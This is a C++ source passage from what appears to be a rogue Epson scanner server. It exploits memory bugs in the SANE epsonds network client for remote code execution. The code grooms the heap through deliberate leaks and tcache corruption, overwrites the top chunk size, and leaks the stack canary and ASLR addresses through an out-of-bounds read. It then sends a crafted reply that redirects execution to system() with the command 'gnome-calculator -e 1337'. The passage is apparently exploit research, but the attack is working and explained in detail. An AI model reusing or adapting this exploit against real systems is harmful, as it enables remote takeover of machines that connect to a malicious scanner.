    // Five VER commands, one every 0x78 bytes, each followed by the same
    // four 64 bit values.
    for (size_t i = 0; i < 5; i++) {
      const size_t offset = sizeof(header) + 41 + 0x78 + i * 0x78;
      sprintf(&buf[offset], "#VERh3cf");
      put64(offset + 8 + 0x40, 0x50);
      put64(offset + 8 + 0x48, 0x25);
      put64(offset + 8 + 0x60, 0x20);
      put64(offset + 8 + 0x68, 0x25);
    }

    sprintf(
      &buf[sizeof(header) + 41 + 0x78 + 5 * 0x78],
      "#PRDh03f#---"
    );

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %zd bytes\n", wr);
    }
  }

  // Send a 75 byte reply (12 byte "IS" header announcing 63 bytes, then
  // "INFOx" followed by "#nrdBUSY#---") in a single write. A send
  // failure is only logged.
  void send_leakmem64_nrdBUSY(SocketHandlerTCP& sock) {
    // Trigger the `wanted > size` case (epsonds-net.c:149), which leaks
    // the reply buffer because we sent a shorter reply than expected.
    const char header[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 63, 0, 0};
    const size_t info_offset = sizeof(header);
    const size_t cmd_offset = 17;

    char reply[75];
    memset(reply, 0, sizeof(reply));
    memcpy(reply, header, sizeof(header));
    memcpy(&reply[info_offset], "INFOx", 5);
    snprintf(&reply[cmd_offset], sizeof(reply) - cmd_offset, "#nrdBUSY#---");

    const bool sent_ok = sock.reply(reply, sizeof(reply)) >= 0;
    if (!sent_ok) {
      printf("send failed.\n");
    }
  }

  // Send a 75 byte reply (12 byte "IS" header announcing 63 bytes, then
  // "INFOx" followed by "#---") in a single write. A send failure is
  // only logged.
  void send_leakmem64(SocketHandlerTCP& sock) {
    // Trigger the `wanted > size` case (epsonds-net.c:149), which leaks
    // the reply buffer because we sent a shorter reply than expected.
    const char header[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 63, 0, 0};
    const size_t info_offset = sizeof(header);
    const size_t cmd_offset = 17;

    char reply[75];
    memset(reply, 0, sizeof(reply));
    memcpy(reply, header, sizeof(header));
    memcpy(&reply[info_offset], "INFOx", 5);
    snprintf(&reply[cmd_offset], sizeof(reply) - cmd_offset, "#---");

    const bool sent_ok = sock.reply(reply, sizeof(reply)) >= 0;
    if (!sent_ok) {
      printf("send failed.\n");
    }
  }

  ssize_t eds_send(SocketHandlerTCP& sock, const uint8_t* buf) {
    if (buf_size_ == 2 && memcmp(buf, "\x1CX", 2) == 0 && reply_len_ == 1) {
      return send_ack(sock);
    } else if (buf_size_ == 12 && memcmp(buf, "INFOx0000000", 12) == 0 && reply_len_ == 64) {
      if (acceptCount_ < A_create_tcache_blocks) {
        printf("A_groom_heap %lu\n", acceptCount_);
        // On the first few iterations, we want to groom the heap by leaking quite
        // a bit of memory. There are three goals:
        //
        // 1. Fill any large gaps so that any subsequent large allocations will
        //    come from the top chunk.
        // 2. Leave plenty of smaller gaps to absorb smaller memory
        //    leaks. In particular, the code is going to leak an object of
        //    type `struct epsonds_device` (size 0xf8 bytes) on every
        //    iteration. Several small strings are also leaked on every
        //    iteration.
        // 3. Empty the tcache for allocations of size 0x3d0, 0x3e0, 0x3f0,
        //    and 0x400. That's because we want to allocate blocks of those
        //    sizes from the top chunk and then store them in the tcache to
        //    use later. If the tcache isn't empty then they won't get allocated
        //    from the top chunk and everything will go wrong.
        //
        // We accomplish these goals by repeatedly leaking a PRD allocation
        // of size 0x3d0/0x3e0/0x3f0/0x400 and a reply buffer of size
        // 0x830. Once we have finished filling any existing gaps, this
        // will settle into a pattern where the leaked reply buffer from
        // the previous iteration gets split to service the PRD allocation,
        // leaving a gap of size 0x400. The end result is that the tcache
        // is full and there are plenty of extra blocks of size 0x400
        // available to service the smaller allocations.
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Just too small to accomodate two blocks of size 0x3d0, so that
        // when it gets split, it doesn't leave a gap that can be reused
        // for an allocation of size 0x3d0.
        const uint32_t more = 0x7a0;
        // Use a PRD to leak an allocation of size 0x3d0/0x3e0/0x3f0/0x400.
        const size_t prdsize = 0x3d0 + 0x10 * (acceptCount_ % 4) - 1;
        sprintf(
          &reply[17], "%07x#iter%lu#PRDh%lxkevwozere#---",
          more, acceptCount_, prdsize
        );
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_leakmem;
        return 20;
      } else if (acceptCount_ == A_create_tcache_blocks) {
        printf("A_create_tcache_blocks %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Allocate 0xa30 bytes into `pbuf`. We will allocate some tcache
        // sized blocks above it in memory. Those blocks will not be returned
        // to the top chunk when they are freed because they will go into
        // the tcache instead. On the next iteration, we will use more = 0x510
        // so that both pbuf and the reply buffer fit before the tcache blocks
        // so that we can use the buffer overflow to overwrite them.
        const uint32_t more = 0xa30;
        // Use a PRD to plug split the pbuf from the previous iteration.
        sprintf(&reply[17], "%07x#iter%lu#PRDh3ff#---", more, acceptCount_);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_create_tcache_blocks;
        return 20;
      } else if (acceptCount_ == A_reindex_tcache_blocks) {
        printf("A_reindex_tcache_blocks %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Overwrite one of the tcache blocks which we created in the
        // previous iteration. We make it bigger so that it overlaps with
        // the other one.
        const uint32_t more = 0x510;
        sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_reindex_tcache_blocks;
        return 20;
      } else if (acceptCount_ == A_overwrite_tcache_blocks) {
        printf("A_overwrite_tcache_blocks %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        const uint32_t more = 0x510;
        sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_overwrite_tcache_blocks;
        return 20;
      } else if (A_create_extra_tcache_block00 <= acceptCount_ &&
                 acceptCount_ < A_large_mmap) {
        // We need to create 5 additional tcache blocks. This takes three
        // iterations per additional tcache block (15 iterations in total,
        // selected by i % 3). On iteration 0, we allocate and free 0x400
        // bytes. On iteration 1, we use the buffer overflow to change the
        // size of the chunk to 0x3e0 and then allocate and free it, so that
        // it gets moved to the tcache index for 0x3e0. On iteration 2, we
        // use the buffer overflow again to change the chunk's size to 0x50
        // while it stays in the tcache for 0x3e0.
        const size_t i = acceptCount_ - A_create_extra_tcache_block00;
        printf("A_overwrite_tcache_blocks%.2lu %lu\n", i, acceptCount_);
        if (i % 3 == 0) {
          char reply[76] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };

          const uint32_t more = 0xa30;
          // Include a PRD to plug the hole from the previous iteration.
          sprintf(&reply[17], "%07x#iter%lu#PRDha2f#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_moreinfo;
          moreinfo_state_ = M_create_extra_tcache_block;
          return 20;
        } else if (i % 3 == 1) {
          char reply[76] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };

          const uint32_t more = 0x510;
          sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_moreinfo;
          moreinfo_state_ = M_reindex_extra_tcache_block;
          return 20;
        } else {
          char reply[76] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };

          const uint32_t more = 0x510;
          sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_moreinfo;
          moreinfo_state_ = M_resize_extra_tcache_block;
          return 20;
        }
      } else if (acceptCount_ == A_large_mmap) {
        printf("A_large_mmap %lu\n", acceptCount_);
        // Do a large allocation which does not get leaked to ensure
        // that sufficient memory has been mmap-ed. Otherwise our top-chunk
        // shenanigans could hit invalid memory and trigger a SIGSEGV.
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        const uint32_t more = large_mmap_size;
        // Use a PRD to plug the hole from the previous iteration.
        sprintf(
          &reply[17], "%07x#iter%lu#PRDha2f#---", more, acceptCount_
        );
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_large_mmap;
        return 20;
      } else if (acceptCount_ == A_create_barrier1) {
        printf("A_create_barrier1 %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Allocate 0xa30 bytes into `pbuf`. We will leak a block above it
        // in memory so that when `pbuf` is freed, it leaves a gap in
        // memory which is exactly big enough for two allocations of size
        // 0x510.
        const uint32_t more = 0xa30;
        sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_create_barrier;
        return 20;
      } else if (acceptCount_ == A_resize_buffer1) {
        printf("A_resize_buffer1 %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Half the size of the previous iteration, so that both `pbuf` and
        // `s->netbuf` fit in the gap before the barrier.
        const uint32_t more = 0x510;
        // We used the PRD command to allocate a large buffer in
        // decode_buffer which is too big to fit before the barrier.
        sprintf(&reply[17], "%07x#PRDha5fkevwozere#---", more);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_resize_buffer;
        return 20;
      } else if (acceptCount_ == A_overwrite_top) {
        printf("A_overwrite_top %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Allocate the same size as the previous iteration so that `pbuf`
        // and `s->netbuf` fit in the gap before the barrier. We also allocate
        // a large PRD. It is too big to fit in the gap reserved for
        // `pbuf` and `s->netbuf` so it goes in the gap that we created in
        // `send_resize_buffer`, which overlaps with the top chunk.
        // The PRD command is carefully positioned (with the AAAAAA padding)
        // So that a stack address will overwrite the size of the top chunk.
        const uint32_t more = 0x510;
        sprintf(
          &reply[17],
          "%07x#AAAAAAAAAAAAAAAAAA#PRDha3fkevwozere#---",
          more
        );
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        // When we use the size of the top chunk to do arithmetic, we can
        // only subtract multiples of 0x10. So we have deliberately written
        // the stack address one byte higher in memory. For example, if the
        // stack address is 0x00007fffcb65c760, then we have overwritten
        // the size of the top chunk with 0x007fffcb65c76000. The bottom
        // byte of the top chunk needs to be 0x5, so the next step is to
        // use a buffer overflow to overwrite the bottom byte.
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_overwrite_top;
        return 20;
      } else if (acceptCount_ == A_subtract_top) {
        printf("A_subtract_top %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Allocate a huge buffer to subtract the desired amount from the
        // size of the top chunk. This is based on the following calculation:
        //
        // 1. We originally grabbed a stack address like 0x7f2641913760
        // 2. The target stack address is 0x7f2641913588
        // 3. But the second exploit needs to aim 0x10 bytes below the target
        //    stack address, so the target is actually 0x7f2641913578.
        // 4. So we want to subtract 0x1e8 from the original stack address.
        // 5. We have shifted the address left by 1 byte, so we actually need
        //    to allocate 0x1e800 bytes to get the desired effect.
        // 6. At this point of the exploit, we have already allocated 0xb3e0
        //    bytes, so there are 0x13420 left to allocate.
        // 7. On this iteration we're going to plug the hole left by the previous
        //    stage (0xb00) and start the process of allocating more memory


        // Now we're going to do a large allocation to subtract the number that
        // we want from the size of the top chunk.
        //

        const uint32_t more = 0x10980;
        // Use a PRD to plug the remaining hole
        sprintf(&reply[17], "%07x#iter%lu#PRDh50fkevwozere#---", more, acceptCount_);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_subtract_top;
        return 20;
      } else if (acceptCount_ == A_copy_pointer) {
        printf(
          "A_copy_pointer %lu  count=%lu\n",
          acceptCount_, copy_pointer_info_count_
        );
        // We trigger the pointer copy on the first visit.  On the second
        // visit, we are just going around the esci2_info an extra time
        // because we need to leak some 64 byte blocks from the tcache.
        copy_pointer_info_count_++;
        if (copy_pointer_info_count_ == 1) {
          char reply[76] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };

          // We just made an allocation of size 0x400 immediately before
          // the top chunk, and it is now in the tcache. So pbuf will get
          // that allocation and will be able to use a PRD command to read the
          // size of the top chunk.
          const uint32_t more = 0x400;
          // Use a PRD to plug the remaining hole
          sprintf(&reply[17], "%07x#iter%lu#PRDh50fkevwozere#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_moreinfo;
          moreinfo_state_ = M_copy_pointer;
          return 20;
        } else if (copy_pointer_info_count_ == 2) {
          char reply[75] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 63, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };
          const uint32_t more = 0;
          sprintf(&reply[17], "%07x#iter%lu#nrdBUSY#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_hdr;
          return 12;
        } else if (copy_pointer_info_count_ == 3) {
          char reply[75] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 63, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };
          const uint32_t more = 64;
          sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_moreinfo;
          moreinfo_state_ = M_leakmem64_nrdBUSY;
          return 20;
        } else {
          char reply[75] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 63, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };
          const uint32_t more = 64;
          sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_moreinfo;
          moreinfo_state_ = M_leakmem64;
          return 20;
        }
      } else {
        // Out of bounds read in decode_binary (epsonds-cmd.c:273)
        // This will read 0xFFF bytes from the stack and copy it into
        // a malloc-ed buffer.
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };
        const uint32_t more = 0;
        sprintf(
          &reply[17],
          "%07x#FB AREAi0000850i0001400#VERhfffkevwozere#---", more);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_hdr;
        return 12;
      }
    } else if (buf_size_ == 12 && memcmp(buf, "CAPAx0000000", 12) == 0 && reply_len_ == 64) {
      if (acceptCount_ == A_copy_pointer) {
        // This stage of the exploit is special. We need to deliberately
        // allocate and leak 64 byte allocations, because we need to exhaust
        // the 64 allocations in the tcache. So we send back a reply that is
        // too short and then follow it with a "more" reply that does the same.
        char reply[75] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 63, 0, 0,
           'C','A','P','A','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };
        const uint32_t more = 0;
        sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        // We just triggered the info leak exploit. We're going to receive a huge
        // dump of the program's memory. We only request the first 4K though,
        // because that will hopefully be enough to deduce all the ASLR offsets
        // that we need.
        state_ = H_wait_hdr;
        return 12;
      } else {
        // Send back an invalid response so that we disconnect cleanly
        // without leaking the 64 byte reply buffer that was allocated in
        // `epsonds_net_write`.
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'C','A','P','A','y',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }

        state_ = H_wait_hdr;
        return 12;
      }
    } else if (buf_size_ == 12 && memcmp(buf, "FIN x0000000", 12) == 0 && reply_len_ == 64) {
      char reply[76] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
         'F','I','N',' ','x',0,0,0,0,0,0,0,0,0,0,0,
         0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
         0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
         0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
        };
      const uint32_t more = 0;
      sprintf(&reply[17], "%07x#---", more);
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      return 12;
    } else {
      printf(
        "eds_send unrecognized command: %s\nbuf_size=%u reply_len=%u\n",
        buf, buf_size_, reply_len_);
      return -1;
    }
  }

  // Handle the payload of a net_lock message (command 0x2100).
  //
  // The payload must be exactly the 7 bytes listed below. If it is, the
  // result of send_ack(sock) is returned; otherwise a diagnostic is
  // printed and -1 is returned.
  ssize_t net_lock(SocketHandlerTCP& sock, const uint8_t* buf) {
    // The only payload that we accept for this command.
    const uint8_t expected[] = {0x01, 0xa0, 0x04, 0x00, 0x00, 0x01, 0x2c};

    printf("net_lock\n");

    if (buf_size_ == sizeof(expected)) {
      if (memcmp(buf, expected, sizeof(expected)) == 0) {
        return send_ack(sock);
      }
      printf("net_lock unexpected payload\n");
      return -1;
    }

    printf("net_lock unexpected buf_size: %u\n", buf_size_);
    return -1;
  }

  // Process the memory dump received from the client and send the final
  // reply.
  //
  // `buf` points at the dump data; the code below reads the first 0x100
  // bytes of it. Three 64-bit values are extracted from fixed offsets, the
  // dump is printed for debugging, and then a reply is built that consists
  // of a 12 byte header followed by a 0x100 byte payload containing the
  // extracted values (some with fixed adjustments) and a command string.
  // The outcome of the send is printed; nothing is returned.
  void read_stackdump(SocketHandlerTCP& sock, const uint8_t* buf) {
    printf("read_stackdump\n");
    printf("cmd: %x\n", cmd_);
    printf("buf_size: %x\n", buf_size_);
    printf("reply_len: %x\n", reply_len_);
    // NOTE(review): `buf` holds binary data and nothing visible here
    // guarantees NUL termination, so "%s" may stop early or read past the
    // end of the received bytes -- confirm against the caller's buffer.
    printf("payload: %s\n", buf);

    // Extract 64-bit values at fixed offsets in the dump. The offsets and
    // the constants subtracted below are hard-coded; presumably they match
    // one specific build of the target -- TODO confirm.
    // NOTE(review): these casts read uint64_t values through a byte pointer
    // with no alignment guarantee.
    const uint64_t canary = *(const uint64_t*)&buf[0x48];
    printf("stack canary: %lx\n", canary);

    const uint64_t stackaddr = *(const uint64_t*)&buf[0x60] - 0x230;
    printf("stack addr: %lx\n", stackaddr);
    const uint64_t returnaddr = *(const uint64_t*)&buf[0x88];
    printf("return addr: %lx\n", returnaddr);
    const uint64_t systemaddr = returnaddr - 0x9ecc;
    printf("system addr: %lx\n", systemaddr);

    // Hex dump of the first 0x100 bytes, two 64-bit words per line,
    // prefixed with the offset.
    for (size_t i = 0; i < 0x100; i += 2*sizeof(uint64_t)) {
      const uint64_t* p = (const uint64_t*)&buf[i];
      printf("%.16lx: %.16lx %.16lx\n", i, p[0], p[1]);
    }

    // Size of the payload that follows the header in our reply.
    const uint32_t len = 0x100;
    // Reply header. Bytes 6..9 are overwritten with the length field below.
    char header[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};

    // The code will crash if it tries to free the buffer (epsonds-net.c:143), so we
    // bypass that by sending fewer bytes than it expects. That's why we write len+1
    // into the header.
    *(uint32_t*)&header[6] = htonl(len+1);

    // The reply is the header followed by `len` bytes, initially all zero.
    char reply[sizeof(header) + len];
    memset(reply, 0, sizeof(reply));
    memcpy(reply, header, sizeof(header));

    // Fill in the payload. Offsets that are not assigned here stay zero.
    char* payload = &reply[sizeof(header)];
    *(uint64_t*)&payload[0x0] = canary;
    *(uint64_t*)&payload[0x10] = 0x100; // rbx
    *(uint64_t*)&payload[0x18] = stackaddr + 0x44; // rbp
    *(uint64_t*)&payload[0x20] = systemaddr; // r12
    *(uint64_t*)&payload[0x28] = 0x1300; // r13
    *(uint64_t*)&payload[0x30] = stackaddr + 0x78; // r14
    *(uint64_t*)&payload[0x38] = 0x1500; // r15
    *(uint64_t*)&payload[0x40] = returnaddr + 0x25db; // return addr
    // NUL-terminated command string placed at offset 0x50 of the payload.
    sprintf(&payload[0x50], "gnome-calculator -e 1337");

    // Send the header and payload in one write and report the result.
    const ssize_t wr = sock.reply(reply, sizeof(reply));
    if (wr < 0) {
      // Save errno immediately, before any other call can modify it.
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %ld bytes\n", wr);
    }
  }

public:
  // Create a handler for a single TCP connection.
  //
  // `acceptCount` is stored in `acceptCount_`, which eds_send compares
  // against the A_* constants to decide which reply to send. The handler
  // starts out waiting for a 12 byte header (H_wait_hdr), with the
  // "moreinfo" sub-state set to M_leakmem and every counter and size field
  // set to zero.
  explicit EpsonHandlerTCP(size_t acceptCount) :
    acceptCount_(acceptCount),
    copy_pointer_info_count_(0),
    state_(H_wait_hdr),
    moreinfo_state_(M_leakmem),
    cmd_(0),
    buf_size_(0),
    reply_len_(0)
  {}

  // Called when a new connection has been accepted: greet the client and
  // then wait for its first 12 byte header.
  //
  // A failed send is only logged. The return value is always 12.
  ssize_t accept(SocketHandlerTCP& sock) override {
    // Welcome message: a 12 byte header followed by the payload. The
    // payload length selects the code path in the client: 5 bytes hits
    // the code in epson2.c, 3 bytes hits the code in epsonds.c. We want
    // the latter.
    const char welcome[] = {
      'I', 'S', 0, 0, 0, 12,
      0, 0, 0, 3,
      0, 0,
      'K', 'E', 'V'
    };

    printf("Sending welcome message.\n");

    const ssize_t sent = sock.reply(welcome, sizeof(welcome));
    if (sent < 0) {
      printf("send failed.\n");
    }

    state_ = H_wait_hdr;
    return 12;
  }

  // Advance the connection's state machine with the bytes that were
  // requested by the previous call.
  //
  // What `buf` contains depends on `state_`:
  //   H_wait_hdr        12 byte message header
  //   H_wait_extra_hdr  8 byte extended header (payload size, reply length)
  //   H_wait_moreinfo   12 byte header + 8 byte extended header (20 bytes)
  //   H_wait_payload    `buf_size_` bytes of payload for command `cmd_`
  //   H_wait_stackdump  13 bytes that are skipped, then the dump data
  //
  // Returns -1 on a protocol error and 0 when no more input is wanted.
  // The positive return values (12, 8, buf_size_, ...) match the size of
  // the message that the next state parses, so the return value is
  // presumably the number of bytes to deliver on the next call -- verify
  // against the RecvHandlerTCP contract.
  ssize_t receive(SocketHandlerTCP& sock, const uint8_t* buf) override {
    // Load a big-endian 32-bit field from `buf`. `buf` is a byte pointer
    // with no alignment guarantee (and offset 6 is never 4-byte aligned
    // relative to it), so copy the bytes out instead of dereferencing a
    // casted pointer.
    const auto read_be32 = [buf](size_t offset) -> uint32_t {
      uint32_t raw;
      memcpy(&raw, &buf[offset], sizeof(raw));
      return ntohl(raw);
    };

    // A header starts with 'I','S', then the two command bytes, then the
    // bytes 0 and 12.
    const auto header_ok = [buf]() -> bool {
      return buf[0] == 'I' && buf[1] == 'S' && buf[4] == 0 && buf[5] == 12;
    };

    switch (state_) {
    case H_wait_hdr:
      // Parse the header. (First 12 bytes.)
      if (!header_ok()) {
        printf("EPSON message has malformed header.\n");
        return -1;
      }

      cmd_ = (((uint16_t)buf[2]) << 8) | buf[3];
      if ((cmd_ & 0xFF00) == 0x2000) {
        // There will be an extended header.
        state_ = H_wait_extra_hdr;
        return 8;
      }
      if (cmd_ == 0x2101) {
        // epsonds_net_unlock
        // That was the final message, so stop reading from the socket.
        return 0;
      }
      buf_size_ = read_be32(6);
      if (buf_size_ > 0x10000) {
        printf("unexpectedly large buf_size_: %u\n", buf_size_);
        return -1;
      }
      reply_len_ = 0;
      state_ = H_wait_payload;
      return buf_size_;

    case H_wait_extra_hdr:
      buf_size_ = read_be32(0);
      reply_len_ = read_be32(4);
